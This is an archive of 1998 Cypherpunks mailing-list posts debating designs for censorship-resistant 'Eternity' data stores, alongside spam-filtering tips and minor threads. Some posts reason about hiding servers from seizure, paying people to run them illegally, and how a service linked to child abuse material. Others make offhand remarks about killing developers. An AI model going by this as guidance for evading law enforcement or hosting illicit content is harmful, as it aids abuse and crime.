Message-ID: <v03102806b0df4ce0852e@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain




My comments below are not meant to cast doubt on Ryan Lackey's scheme, but
just to raise some questions.

I am surprised, I have to admit, that Ryan is talking so much about raising
money, getting investors, etc., when no _working model_ of his scheme has
been deployed for people to play with, find weaknesses in, etc.

(In comparison to, say, remailers, which have existed for more than five
years now, with literally thousands of articles--some good, some
bad--written about them in all of their various facets. Even specialized
lists for remailer operators, Mixmaster-type remailers, etc. And yet there
have been no serious calls for investors to pour money in.)

Frankly, in reading Ryan's summary, including assertions like "In my
system, no one knows (ideally) who is actually storing the data, only those
on the edges of the system (who will hopefully only be known by a logical
address)," I find no real discussion of the *core idea*, the _reason_ his
data base is in fact secure.

(I apologize if a full discussion is contained in his earlier documents.
Even if his earlier documents had a fuller description, there has certainly
been an almost complete lack of discussion of his system here in
Cypherpunks. Given the additional complexitities an Eternity type data base
has over something as conceptually simple as a remailer, the lack of
discussion is not confidence-inspiring that Ryan somehow got it all
right.....)

Anyway, I can think of all sort of threat models, and ways of (maybe)
attacking any system of linked machines I can think of, except ones using
message pools (which is why I'm biased in favor of Blacknet, I suppose).

(The motivation for Blacknet was to a) demonstrate message pools, b) show
that anyone could be a node, c) build a system where the links between
nodes are all of the traffic in "speech space," and that so long as
encrypted messages could be posted in speech space (Usenet, boards, etc.),
then the system could not be shut down. Basically, to stop Blacknet one
would have to ban remailers in all jurisdictions, or ban speech coming from
certain jurisdictions. Otherwise, it's too distributed to stop.)

(Note: But Blacknet has long latency, derived from its "speech"
underpinnings. There is the temptation to go to faster links, to move away
from speech space into traditional network links. But this reduces the
number of nodes and links, and makes an attack on the reduced-but-faster
network no longer equivalent to interfering with free speech. A
technological win but a political lose.)

Until we see a mathematical model--forget the details of implementation,
the epiphenomenal stuff about Oracle, AOLServer, Alphas, and K6s!--of how N
distributed nodes store incoming files in such a way that the goals of
Eternity can be satisfied...

(And we need to discuss in more detail just what the goals can
realistically, and economically, be.)

There are a bunch of issues which come up, motivated by Ryan's comments
that he already has the design of a file system in mind:

- why won't all machines in the network in Country A simply be shut down,
regardless of whether the Authorities can prove which machine in particular
is storing the banned material?

After all, when a kiddie porn ring has its computers seized, the
Authorities don't necessarily have to prove exactly which disk sector (or
even which disk drive) is storing a file...they can either seize the lot,
and prosecute successfully, that the ensemble was the nexus, or
instrumentality of the crime.

To paraphrase Sun, "the network _is_ the crime."

- given the problems remailer networks have to deal with, with traffic
analysis and correlation analysis (an area we have alluded to but not done
serious work on), why would not the same methods be applicable to tracking
movements through the system Ryan is apparently proposing?

(I believe a 20 MB child porn video MPEG sent into the Eternity network
would leave "footprints" an analyst or watcher could track. I am willing to
be show the error of my ways, but only with some calculations of diffusion
entropy, for example.)

- In short, I want to see some simple descriptions of WHAT IS GOING ON.

It has always been very easy for us to describe how networks of remailers
work--so simple that at the very first Cypherpunks meeting in '92 we played
the "crypto anarchy game" with envelope-based remailers, message pools,
digital cash, escrow, etc. (Running this simulation took several hours, but
taught us a lot.)

I'd like to know how Eternity DDS _works_. Then we can start mounting
attacks on it: spoofing attacks, denial of service attacks, and attacks
assuming various levels of observability into the network linking the nodes.

Until then, I think it's a waste of time and money to be coding a detailed
implementation of a protocol.

(And it may _still_ be a waste of money, even after the protocol is beat
upon thoroughly. There is no clear market for such a service, and not even
for remailers. And maybe not even for PGP, in terms of paying customers
sufficient to pay the bills. Not to criticize PGP, just noting the obvious,
the same obvious situation that seems to be the case with digital cash.
Great idea, but where are the customers?)

Thanks,


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Mon, 12 Jan 1998 11:12:22 +0800
To: cypherpunks@www.video-collage.com
Subject: Re: Spam
In-Reply-To: <3092d7f2431e74ea40b5d0ad22244ca3@squirrel>
Message-ID: <199801120305.VAA00843@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



There are very good ways of filtering email, as well as methods
of "proper" exposure to email harvesting bots.

My suggestions are:

1. Create a "spam" mailbox that will be used to collect all email
that looks like spam. It is much easier to review this mailbox once in a
couple of days than to look at spam in the mail email mailbox.

2. Create one or more mailfolders for mailing lists you receive. Save
all mailing list messages to them. (you may want to save everything 
that was sent by *owner* as it is likely to be legitimate mailing
list messages).

3. Everything else that does NOT mention one of your legitimate addresses
is likely spam, and needs to be saves into the spam mailbox.

4. Keep a database of spamming patterns and spamming domains and save
everything matching these patterns to the spam mailbox. (my database is
attached below).

5. Post to USENET using an address that reaches you, but is different
from your email address.

Anything that comes in as sent to that address (usually Received: field 
contains the destination address) but does not start with Re: or is not
addressed to that address is spam, and needs to be saved into the spam
mailbox.

6. This will inevitably flag some legitimate messages as spam. Be careful
reviewing the spam mailbox.

igor

^From: trichosis@noci.com
^From:.*chaspub@onecom.com
^From:.*@news-release.com
^From:.*isp-inter.net
^To: All@Internet.Users
^From:.*success@
^From:.*orders@compugen.net
^From:.*dispatch@cnet.com
^Received:.*isp-inter.net
^From: distributor@jax.gulfnet.com
^From: NETDATA Intl Inc
^From ChrisMSW1@aol.com
^Reply-To: phnxgrp
^From: sbear1@earthlink.net
^From: .*@pwrnet.com
^From: gary@safetydisk.com
^Subject: How to get MORE ORDERS for ANYTHING you sell
^Subject: EL Cheepo Web pages
^Message-Id: Ready Aim Fire
^Message-Id: RAF
^Subject: Saw you Online\!
^Subject: THINNING HAIR
^From: express@capella.net
^From: .*fgle5@ziplink.net
^From: .*softcell.net
^To: bubbac@webconnect.com
^Received: .*IQ-Internet.com
^From: freedom
^To: Friend@public.com
^To: .Recipient list suppressed.
^Received: .*Cyber Promotions
^From: money@
^From: rocket3@ibm.net
^From: Svetlana <info@svetlana-spb.com>
^From: .*remove@
^From: .*@GettingRich.com
^Subject: .*README! It may change your life forever!
^X-Shocking-Web-Page:
^To: you@
^X-Advertisement:
^From: .*@shoppingplanet.com
^X-Mailer: Emailer Platinum
^From: dkg@sparrow.spearhead.net
^From: .*floodgate
^Igor Chudov @ home,
^Subject: Your Family Name





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blanc <blancw@cnw.com>
Date: Mon, 12 Jan 1998 14:10:57 +0800
To: cypherpunks@cyberpass.net
Subject: Re: rant on the morality of confidentiality
Message-ID: <3.0.32.19980111213213.0071be38@cnw.com>
MIME-Version: 1.0
Content-Type: text/plain



Dr.Dimitri Vulis KOTM wrote:

>You're missing my point. If the society would benefit from a certain
behavior,
>it should not rely on coercion, but use economic motivation to encourage it.
>Clearly NSF doesn't work any better than NEA.
........................................................................

Nah, I saw your point, but just forgot to mention it.   I do agree with
you, except a bit with the part about the source of encouragement (of
course, I would agree against bringing coercion into the picture, banish
the thought).   To be even more precise about this, it is the ones in
society whom you might imagine should provide 'encouragement', or
'incentivization',  who need to develop an appreciation and recognition for
certain values, since they're aiming for real benefits.   Creative,
inventive people don't really need that much motivation, but it's their
potential market who could stand to 'graduate towards the light', so to
speak.  Then there would exist more educated, seeking, paying,
clients/investors.

In any case the creative types still have to, like most all other
enterprises, search for the right market, the willing investor, the
interested customer/client.  It's a great thing that the net can now bring
these two more easily together, helping each to find the other.  Even if
they still can't trust each other, but must resort to lawyers to keep
things clear & clean and moral.  (smiley)
   
    ..
Blanc





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 12 Jan 1998 10:48:16 +0800
To: Bill Stewart <bill.stewart@pobox.com>
Subject: Re: Adding SSL to things
In-Reply-To: <3.0.5.32.19980111132145.00883540@popd.ix.netcom.com>
Message-ID: <199801120241.VAA12033@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



AOLserver (formerly GNN's NaviServer) has better RDBMS integration features
than the apache crowd.  Phil Greenspun's site, www.photo.net, uses roughly
the same software I'm using (I asked him for advice, he swayed me from
Apache to AOLserver).  Once Apache has better Oracle integration, I might
go back to it, since I do like having source to as much as possible, but
right now, being able to easily and efficiently link Oracle to the web
server is a bit more important than source or simple to implement SSL.
-- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 12 Jan 1998 07:17:05 +0800
To: elitetek@usa.net
Subject: Re: (eternity) mailing list and activity
In-Reply-To: <34B9327A.2AAEEF87@ix.netcom.com>
Message-ID: <199801112144.VAA00285@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




[I've Cc'ed this to cypherpunks from discussion on eternity@internexus.net]

Jeff Knox <trax@ix.netcom.com> writes:
> I do have a few questions. I am curios as to how i would go about
> creating a domain service. If i wanted to start a domain service to
> server a domain i create like test.dom, how would i run a server to
> processes the request, and how would all the other servers around
> the world cooperate?

Firstly note that there are 3 (three) systems going by the name of
eternity service at present.  Ross Anderson coined the term, and his
paper which describes his eternity service, you should be able to find
somewhere on:

	http://www.cl.cam.ac.uk/users/rja14/

Next, my eternity prototype which I put a bit of time into hammering
out last year in perl, borrows Ross's name of "eternity service", but
differs in design, simplifying the design by using USENET as the
distributed database / distribution mechanism rather than constructing
one with purpose designed protocols:

	http://www.dcs.ex.ac.uk/~aba/eternity/

And there is Ryan Lackey's Eternity DDS (where DDS stands for I
presume Distributed Data Store?).  I am not sure of the details of his
design beyond that he is building a market for CPU and disk space, and
building on top of a an existing database to create a distributed data
base accessible as a virtual web space (amongst other `views').  He
gave this URL in his post earlier today:

	http://sof.mit.edu/eternity/


To answer your question as applied to my eternity design, I will
describe how virtual domains are handled in my eternity server design
which is based on USENET as a distributed distribution medium.  A
proto-type implementation, and several operational servers are pointed
to at:
	
	http://www.dcs.ex.ac.uk/~aba/eternity/

In this design the virtual eternity domains are not based on DNS.
They are based on hash functions.

Really because it is a new mechanism for accessing information URLs
should perhaps have the form:

	eternity://test.dom/

Where a separate distributed domain name lookup database is defined,
and a distributed service is utilised to host the document space.
However because it is more difficult to update browsers to cope with
new services (as far as I know, if anyone knows otherwise, I'd like
pointers on how to do this), I have represented URLs of this form
with:

	http://test.dom.eternity/

This would enable you to implement a local, or remote proxy which
fetched eternity web pages, because you can (with netscape at least)
direct proxying on a per domain basis.  Using the non-existant top
level domain .eternity, you can therefore redirect all traffic for
that `domain' to a local (or remote) proxy which implements the
distributed database lookup based on URL, and have normal web access
continue to function.

My current implementation is based on CGI binaries, so does not work
directly as an eternity proxy.  Rather lookups are of the form:

	http://foo.com/cgi-bin/eternity.cgi?url=http://test.dom.eternity/

The virtual eternity URLs (URLs of the form http://*.eternity/*) are
converted into database index values internally by computing the SHA1
hash the URL, for example:

SHA1( http://test.dom.eternity/ ) = d7fa999054ba70e1ed28665938299061b519a4f7

The database is USENET news, and a distributed archive of it; the
database index is stored in the Subject field of the news post.

The implementation optionally keeps a cache of news articles indexed
by this value on eternity servers.  If the required article is not in
the cache it is searched for in the news spool.

Currently this is where it stops, so articles would have to be
reposted periodically to remain available if articles are either not
being cached, or are flushed from the cache.

However the cache is never flushed, because the cache replacement
policy is not currently implemented.

An improvement over this would be to add a random cache flushing
policy and have servers serve the contents of their cache to each
other forming a distributed USENET news article cache.

Another option would be to search public access USENET archives such
as dejanews.com for the requested article.


The problem is really that we would prefer not to keep archives of
articles directly on an open access server, because the server's disks
could be seized, and the operator could be held liable for the
presence of controversial materials.

Wei Dai suggested that documents should be secret split in a redundant
fashion so that say 2 of 5 shares are required to reconstruct the
document.  If the shares are distributed across different servers,
this ensures that one server does not directly hold the information.

Ross describes ideas on how to ensure that a server would not know
what shares it is holding in his paper which can be found on his web
pages, the url being linked from:

	http://www.cl.cam.ac.uk/users/rja14/

Adam





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 12 Jan 1998 11:23:04 +0800
To: cypherpunks@cyberpass.net
Subject: Crypto Jokes
Message-ID: <1.5.4.32.19980112032221.010342d4@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Inspired by "Crypto Kong," contributions of crypto jokes 
are requested, to enliven our Web site, which is pretty 
gray these days without congressional buffoonery. 

Thigh-slappers are preferred, but since one person's
humor is another's pain, any bizarre tales of woe,
stupidity and vanity are welcomed. Short as possible,
like Adam's three swines of pearl.

Sure, anonymous zingers are great. No pay, no
apologies for missing the point.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 12 Jan 1998 11:28:40 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Eternity Services
In-Reply-To: <v03102800b0deac61cffd@[207.167.93.63]>
Message-ID: <199801120324.WAA12254@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


> 
> I haven't been following the latest round of "Eternity" discussions. I
> gather that Ryan's efforts are distinct from Adam Back's efforts, which are
> themselves distinct from the seminal Ross Anderson researches (for example,
> at http://www.cl.cam.ac.uk/users/rja14/eternity/node4.html).

Yes, all three efforts are distinct at present.  My "secret" plan is to try
to get a technical design document and demo which are so compelling that
in the end it merges into one Eternity project, though :)

> 
> But Ryan's comments leave me with some questions:
> 
> 
> At 3:11 AM -0800 1/11/98, Ryan Lackey wrote:
> 
> >If I find investors/customers/etc. by March-July 98 for Eternity DDS, though,
> >I'm planning to buy 8 DEC AlphaPC motherboards with dual 21264 processors.
> >Some pieces of Eternity DDS are now being implemented in Oracle for
> >speed of implementation reasons, and other pieces are being prototyped
> >in Scheme (maybe), so even my K6 is getting hammered.  Plus, I'm now testing
> 
> Will these be located in the U.S.? Will their locations be publicized? Will
> any offshore (non-U.S.) locations be publicized?

Hopefully I can allay your fears.

I want the alphas for testing and compiling during the not-yet-production
phase.  They'll be located in one place, subject to being shut down legally
or extralegally.  However, there will be no production data on them, so
there will be no reason to shut them down.  To attack them preemptively would
be less efficient than simply killing the maybe 20 people in the world
who are involved with Eternity development.

I want to have a cluster of machines on which to simulate a working eternity 
system.  I'm trying to develop interconnect protocols which scale to a large 
number of users with the minimum possible trust, no particularly vulnerable
points, etc.  Even me personally owning any substantial amount of machines
involved in a production Eternity implementation while living in the US would
be risky -- I want people to be able to continue to use Eternity even if I
turn out to be a secret NSA agent bent on world domination.  

> [vulnerability of any identified servers]

To this I add the threat of illegal action by enemies of users of the system, 
government or otherwise.  As a result, having *any* of the nodes be locatable
on a network or in physical space is a threat.  Knowing the IP addresses of
all the Eternity servers in the world would be enough to let you flood
them out of existence.

Unfortunately, in order for Eternity to be accessible to the world in some
way, some nodes need to have public logical addresses in some way.  This
opens up a bunch of pathways to attack.

Eternity DDS has market-based protocols to try to hinder these attacks.

> So, the talk about the hardware of all these Alpha servers raises some
> interesting questions.
> 
> I would have thought that a much more robust (against the attacks above)
> system would involve:
> 
> - nodes scattered amongst many countries, a la remailers
> 
> - no known publicized nexus (less bait for lawyers,  prosecutors, etc.)
> 
> - changeable nodes, again, a la remailers
> 
> - smaller and cheaper nodes, rather than expensive workstation-class nodes
> 
> - CD-ROMS made of Eternity files and then sold or distributed widely
> 
> - purely cyberspatial locations, with no know nexus
> 
> (I point to my own "BlackNet" experiment as one approach.)

Yes, that's effectively what I'm trying to do.  Eternity DDS is currently
being developed on the "Athena model" as a bunch of interoperating services
with general utility as well.

During testing, I'm using stuff like Oracle to prototype large sections of the
application.  I've run hundreds of clients off my K6 talking to a couple of 
servers
on my K6.  This does not mean that the production system will involve my k6 in
any way, except perhaps as my client.

I think that Eternity is effectively a massive distributed database, in that a 
filesystem
is a kind of database.  I also think selling just storage is kind of silly -- 
one needs
to take into account bandwidth and computation as well, in order to allow 
people to
do truly interesting things.  With a sufficiently trusted JVM, one could 
execute some subset
of java code remotely fairly securely.  I'm planning to have interfaces to the 
Eternityspace
which make it look like a massive web server, a massive traditional database 
server, a filesystem,
ftp, email server, etc.  This helps functionality and security.

The design is a compromise between security and efficiency.  In many cases 
being
distributed is good for both, but in at least two areas, trying to make E-DDS 
distributed is making it less efficient.  I forsee that the initial limited
production system will have a nexus in that the auction market will probably
be run by my organization through a geographically-dispersed network of 
machines
with byzantine fault tolerance.  I also forsee an initial small number of nodes
interfacing Eternity DDS to the world (via the web, database protocols, 
filesystem
protocols, etc.).  While there will be encryption between those servers and 
their
clients, they will be targets for attack -- however, there are a bunch of 
techniques
for making them ephermeal, some of which you have mentioned.
> 
> It may be that the architectures/strategies being considered by Ryan
> Lackey, Adam Back, and others are robust against the attacks described
> above.

I hope so.
> 
> Basically, if the Eternity service(s) can be traced back to Ryan or Adam or
> anyone else, they WILL be subject to court orders telling them to produce
> certain files, telling them to cease and desist with regard to certain
> distributions, and so on. Even raids to carry off the entire file system
> for analysis will be likely.
> 

I hope to leave the country before Eternity DDS goes public.  I think raids
on US sites, or unprotected foreign sites, are highly likely, legal or 
otherwise.
I don't believe any government will provide any real defense for an identified
Eternity server or nexus or involved person, once it starts being used for
corporate espionage, money laundering, political activism, etc.  The only 
defense
is to make sure the collateral damage from taking it out is high enough that 
they
won't, like an inoperable tumor (a 10mm does a good job of removing most 
individual
cancer, but sometimes killing the patient is unacceptable)

Hopefully, the designers of the first production Eternity service can make 
themselves
irrelevant enough to not be worth killing, and/or difficult enough to kill 
that the
collateral damage from killing them would be unacceptable.

> It is also likely in the extreme that a working Eternity service will
> quickly be hit with attackers of various sorts who want to test the limits
> of the service, or who want such services shut down. Thus, expect all kinds
> of extremely controversial material to be posted....granted, this is a
> "reason" for such services, but see how long the system lasts when it
> contains child porn, Scientology secrets, lists of CIA agents in Europe,
> copies of Microsoft Office for download, and on and on.

Yes.  I'm designing for the worst.
> 
> And even a decentralized, replicated system will of course still expose the
> owner/operator in some jurisdiction to his local laws. (As Julf was exposed
> to the laws in his country, and that was just the tip of the iceberg.
 
I'm planning to move to the most laissez-faire location possible.  I also want
to make myself irrelevant once the system enters production (which does not
necessarily mean I won't try to get rich, just that if someone corrupts or
kills me it won't make any difference to the operation of the system).

> Eternity nodes must not be identifiable, and their locations must not be
> known. Anything else is just asking for major trouble.

I agree with you 100%.  There are technical considerations which come into play
defending eternity nodes from TA, other corrupt nodes, etc., but they are in 
the
main solvable.  The borders of the eternity logical network become exposed, 
but it
is possible to push those borders far enough out that it becomes the 
responsibilty of
other unwitting parties to shut them down.

My design goal is truly distributed and truly secure.  In order to take out 
eternity, I
hope to make it necessary for the attackers to take out the Internet, 
something even
overly communist regimes are unwilling to do.

I think Adam Back's Eternity implementation mostly meets the "lightweight nodes
which no one cares about" in theory, and if his assumption that usenet will not
be attacked is valid, it has met the "unacceptably high collateral damage"
criteria.  I'm somewhat unsure of that assumption, though.

Plus, the central difference between Eternity DDS and the other two Eternity
designs is that market forces will be used to give people an incentive to 
break the
law by running Eternity DDS servers secretly in Burma (both internal storage
nodes and throwaway interface nodes).  I think market forces are the only way 
to
get people to implement a large enough Eternity logical network to provide
protection from a concerted attack.

> 
> Comments?

More discussion would be great.  I think everyone agrees on the basic 
requirements
for Eternity implementation -- it's just a question of which compromises one 
must
make to technical expediency, as well as advanced technical methods one can use
to minimize those compromises.  

[Pseudo-ob-non-crypto: I apologize for sof.mit.edu's web server being dead for 
a while.  It
managed to wedge itself quite nicely, and I didn't find out about it until 
someone sent me
mail.  Again, I'm putting as much documentation as I can up on 
http://sof.mit.edu/eternity/]

- -- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNLmM16wefxtEUY69AQGobAf/c8PleA2nc4a17HikOGbevX6l/hJzZCf1
ZwwSM2X9jT0Jbg3FhGBt4aj2mRSDDYA9C96StMl2tNZlIQf4PKtyIt2mysh4dO1L
OsmAgemdqh9oHSEHalSDasGURSdzWBCuMctgcwT2BA+zWmWNILo4pw8ePgH2Hc2e
tTmJpfrALMU2pOjkeQ3R6OPOVRPc4JRz/XpRLcFbwEy2DahVzc1ICjfdO7II/qhd
3UJtpxF+mKBrSLVfCINrkg6kXR2c9aL4bFBm5ZoINADH/sPSqghzgNRE9RLLpvqD
2bZmmzUUAgoTNhSEqHk0xl4VaRmVBf1JntetTmWBe1h2b7rh/Anr5w==
=0O/n
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 12 Jan 1998 11:27:30 +0800
To: cypherpunks@cyberpass.net
Subject: Crypto Jokes
Message-ID: <1.5.4.32.19980112032616.006bd70c@pop.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain



Inspired by "Crypto Kong," contributions of crypto jokes 
are requested, to enliven our Web site, which is pretty 
gray these days without congressional buffoonery. 

Thigh-slappers are preferred, but since one person's
humor is another's pain, any bizarre tales of woe,
stupidity and vanity are welcomed. Short as possible,
like Adam's three swines of pearl.

Sure, anonymous zingers are great. No pay, no
apologies for missing the point.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Lackey <rdl@mit.edu>
Date: Mon, 12 Jan 1998 12:11:11 +0800
To: Adam Back <aba@dcs.ex.ac.uk>
Subject: Re: Eternity Services
In-Reply-To: <199801112306.XAA00525@server.eternity.org>
Message-ID: <199801120405.XAA12512@the-great-machine.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----


Adam Back <aba@dcs.ex.ac.uk> writes:
> 
> Tim May <tcmay@got.net> writes:
> 
> > Any file system which can be identified as to *location in some legal
> > jurisdiction*, espeically in the U.S. but also probably in any
> > OECD/Interpol-compliant non-U.S. locations, will be subject to COMPLETE
> > SEIZURE under many circumstances:
> > 
> > * if any "child porn" is found by zealous prosecutors to be on the system(s)
> 
> I think child porn is pretty much the canonical example -- the spooks
> / feds have a history of posting their own child porn if none is
> available to seize.  (eg The Amateur Action BBS case which Tim cites
> classic case -- the Thomases had not had any dealings with child porn,
> but a US postal inspector mailed some to them, and busted them for it
> before they had even opened the package.  They are still in jail
> now.)
> 
> I agree with Tim that actually building distributed file systems where
> data can be traced back to the server serving it will cause problems
> for the operators.  I think even if there are many operators, and even
> if the data is secret split, the operators would likely be held
> liable.

I agree as well.
> 
> Ross's paper describes some techniques for building a distributed
> database which makes it difficult for a server to discover what it is
> serving.  (Necessary because an attacker will become a server operator
> if this helps him).
>
> The threat of seizure is the reason that I focussed on using USENET as
> a distributed distribution mechanism.  All sorts of yucky stuff gets
> posted to USENET every day, and USENET seems to weather it just fine.
> 
> The idea of using new protocols, and new services as Ross's paper
> describes is difficult to acheive a) because the protocols are more
> complex and need to be realised, and b) because you then face
> deployment problems with an unpopular service and supporting protocols
> who's only function is to facilitate publishing of unpopular
> materials.

Solved, I think  a) someone drops out of MIT and works on Eternity DDS to
the point where people want to dump money into it, assuming it is
a fundamentally good idea, and b) by using market based protocols which give
a financial incentive to people running stuff, there is a rush to set up
eternity servers.

In my system, no one knows (ideally) who is actually storing the data, only
those on the edges of the system (who will hopefully only be known by
a logical address).  
> 
> The solution I am using is to keep reposting articles via remailers.
> Have agents which you pay to repost.  This presents the illusion of
> persistance, because the eternity server will fetch the most recent
> version currently available in the news spool.  This avoids
> centralised servers which would become subject to attack, all that is
> left is a local proxy version of an eternity server which reads news
> from an ordinary news spool.

That sounds like an interesting idea.  It is certainly far simpler to
implement than my suite of protocols.

> > - purely cyberspatial locations, with no know nexus
> >
> > (I point to my own "BlackNet" experiment as one approach.)

You may have solved the problems of persistence in Eternity, and if users
are intelligent about picking addresses, you may have solved the persistent
and logical URN problem.  Cool!

I'm not sure the problems of scaling to a full production system have been 
addressed,
though.  Would usenet simply ignore the additional, and potentially highly 
illegal,
and non-readable traffic?  alt.binaries.warez got punted pretty quickly.  
Also, your
scheme does not include any provisions for people to post active objects of
any kind, or market-based load balancing, both of which I consider critical
features -- people will overload any Eternity server they can find -- what 
financial
motivation would the overt owners of the server have to upgrade to handle the 
traffic?
USENET is also not quite as resilient as it used to be.

I may have an unreasonable bias against usenet, but I think any protocol which 
depends
upon USENET rather than just using it as one of many potential transport 
mechanisms
is unable to scale.  Certainly the performance of your Eternity implementation 
will
be far from real time.  Coupled with not providing dynamic objects of any 
kind, I think
there are a large number of services which could not function in your system.

It's still has a lot of potential, and is actually highly feasible to 
implement, which is
good.  And you seem to be evolving it, which leads me to think any potential 
problems
will eventually be solved.  It would be interesting if we could share 
components which
were common to both designs, such as a payment arbitrator or whatever.

Having multiple interoperable Eternity implementations would actually be 
really interesting.
They could store data in each other, in something of a recursive auction 
market (the
data taken from a user commands a premium price immediately because it's 
"hot", once
it gets buried a bunch of times it is a bit more shielded), share payment 
protocols, etc.
Letting the market decide where it wants to put its data seems like the best 
plan.
- -- 
Ryan Lackey
rdl@mit.edu
http://mit.edu/rdl/		



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBNLmWnqwefxtEUY69AQGdzAf+PAbPSbO202uPSBJImJ9JDryHvWRvMA5H
QSdh+nsAq2dvXUkLm+ReJfYs4PDTimhBPYLxiAo/ooMeAsWwzCMNjFHeqS6V5VCV
dM4mJ37SsNTauVtcvWTTBJELlq4kzOjV2Lyn/eDvWwdnhvIv24mWclUZy8EC+0b6
+KEFktcK25SIIO0VH/fezHixawl+AiM1LATxMm8chmc4FTiHUc6swTSulOap0zeT
te21+zPuq0N5stzRPDfTePrjhneR3Zku9hq0sxK0Nbzaz790Jb4jh+q2XsFK0ow+
JiQZ59dj4bGHjq2H1u4TVcHQ/B16LZDxUz1nyvfw2uPBldmIQ0XSYw==
=AfMI
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Mon, 12 Jan 1998 07:17:27 +0800
To: tcmay@got.net
Subject: Re: Eternity Services
In-Reply-To: <v03102800b0deac61cffd@[207.167.93.63]>
Message-ID: <199801112306.XAA00525@server.eternity.org>
MIME-Version: 1.0
Content-Type: text/plain




Tim May <tcmay@got.net> writes:

[ Ryan Lackey on proposed hardware setup for his Eternity DDS ]

> Will these be located in the U.S.? Will their locations be
> publicized? Will any offshore (non-U.S.) locations be publicized?
> 
> Any file system which can be identified as to *location in some legal
> jurisdiction*, espeically in the U.S. but also probably in any
> OECD/Interpol-compliant non-U.S. locations, will be subject to COMPLETE
> SEIZURE under many circumstances:
> 
> * if any "child porn" is found by zealous prosecutors to be on the system(s)

I think child porn is pretty much the canonical example -- the spooks
/ feds have a history of posting their own child porn if none is
available to seize.  (eg The Amateur Action BBS case which Tim cites
classic case -- the Thomases had not had any dealings with child porn,
but a US postal inspector mailed some to them, and busted them for it
before they had even opened the package.  They are still in jail
now.)

An article which got forwarded to cypherpunks a while back was a URL
for some people who had created a for-pay web service which consisted
soley of hypertext links to child porn articles in usenet.  I never
did investigate (the worry is always that it is a sting in itself, and
I was interested in the techniques not the material), but it is
interesting that these people considered this action safe enough for
the monetary rewards to compensate.  

(Anyone save this post / URL, or know if these people are still in
business, or what technique they used to be able to generally link to
USENET articles... is it possible to link to
news:alt.anonymous.messages/message-id in a way which is independent
of news spool?)


I agree with Tim that actually building distributed file systems where
data can be traced back to the server serving it will cause problems
for the operators.  I think even if there are many operators, and even
if the data is secret split, the operators would likely be held
liable.

Ross's paper describes some techniques for building a distributed
database which makes it difficult for a server to discover what it is
serving.  (Necessary because an attacker will become a server operator
if this helps him).


The threat of seizure is the reason that I focussed on using USENET as
a distributed distribution mechanism.  All sorts of yucky stuff gets
posted to USENET every day, and USENET seems to weather it just fine.

The idea of using new protocols, and new services as Ross's paper
describes is difficult to acheive a) because the protocols are more
complex and need to be realised, and b) because you then face
deployment problems with an unpopular service and supporting protocols
who's only function is to facilitate publishing of unpopular
materials.


So I focussed on USENET, but the weakness of using USENET for building
a distributed database where data is intended to persist for
protracted periods of time is that USENET articles expire, existing in
news spools often for only 3 days or so.  The problem is really that
USENET is essentially a distributed _distribution_ mechanism, and not
a distributed database.

Archiving USENET as a separable enterprise which charges for access
(altavista for example charges via advertisements) seems less
problematic than directly trying to build a database of controversial
materials.  Archiving it all partly reduces your liability I think,
because you are not being selective, you just happen to have a
business which archives USENET.  However there are two problems with
this: a) volume -- USENET daily volume is huge; b) the censors will
ask you to remove articles they object to from the archive.

The solution I am using is to keep reposting articles via remailers.
Have agents which you pay to repost.  This presents the illusion of
persistance, because the eternity server will fetch the most recent
version currently available in the news spool.  This avoids
centralised servers which would become subject to attack, all that is
left is a local proxy version of an eternity server which reads news
from an ordinary news spool.

My current implementation is a CGI binary which is currently running
as a remote eternity server.  You can run it as a local eternity
server if you have a local UNIX box, running say linux.

Better would be a more general local proxy for other platforms.  I am
working on this local proxy version at present.  This is the state of
play for me.


The reposter will be either the publisher of the article, or a
reposting agent.  In either case remailers can be used.

Remailer resistance to attack has improved a lot since some of the
remailers started using disposable hotmail etc accounts as exit nodes
-- the remailer is no longer traceable without a much higher resources
being spent by the attacker.  Using a chain of mixmaster remailers,
and a remailer using hotmail for delivery provides good anonymity.

> I would have thought that a much more robust (against the attacks above)
> system would involve:
> 
> - nodes scattered amongst many countries, a la remailers

Better to have no nodes at all, as with USENET only solution.  The
reposting agent (which may be the publisher, or interested reader if
they are fulfilling the role of reposting agent) is a node of sorts,
however this node can be replicated, can move frequently, and only
ever need communicate via remailers.

